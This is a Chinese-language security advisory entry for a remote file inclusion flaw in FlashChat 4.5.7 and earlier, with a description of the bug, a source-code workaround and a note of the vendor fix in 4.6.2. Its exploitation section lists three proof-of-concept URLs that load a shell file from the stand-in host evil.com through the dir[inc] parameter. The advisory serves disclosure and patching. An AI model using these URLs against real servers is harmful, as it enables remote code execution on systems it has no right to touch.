添加时间:
2008-10-03

系统编号:
WAVDB-01038
BUGTRAQ: 19826

影响版本:
Flashchat <= 4.5.7

程序介绍:

FlashChat是一款个性化聊天室，支持大部分的PHP格式的CMS系统，也可以作为独立的聊天室。

漏洞分析:

FlashChat在处理用户请求时存在输入验证漏洞，远程攻击者可能利用此漏洞以Web进程权限执行任意命令。

FlashChat的/inc/cmses/aedating4CMS.php、/inc/cmses/aedatingCMS.php和/inc/cmses/aedatingCMS2.php脚本没有正确验证dir[inc]变量用户输入，允许攻击者通过包含本地或外部资源的任意文件导致执行任意脚本代码。

漏洞利用:

http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http://evil.com/shell.txt? http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http://evil.com/shell.txt? http://site.com/[script_path]/inc/cmses/aedatingCMS.php?dir[inc]=http://evil.com/shell.txt?

解决方案:
临时解决方法：
将以下文件
$aed_root_path = realpath(dirname(__FILE__) . '/../../../') . '/';
include($aed_root_path . 'inc/header.inc.php');
require_once( "$dir[inc]db.inc.php" );
require_once( "$dir[inc]admin.inc.php" );
修改为：
$aed_root_path = realpath(dirname(__FILE__) . '/../../../') . '/';
include($aed_root_path . 'inc/header.inc.php');
require_once( "[Your AED path]/db.inc.php" );
require_once( "[Your AED path]/admin.inc.php" );

厂商补丁：
TUFaT
-----
目前厂商已经在4.6.2及以上版本的软件中修复了这个安全问题，请到厂商的主页下载：
http://www.tufat.com/index.php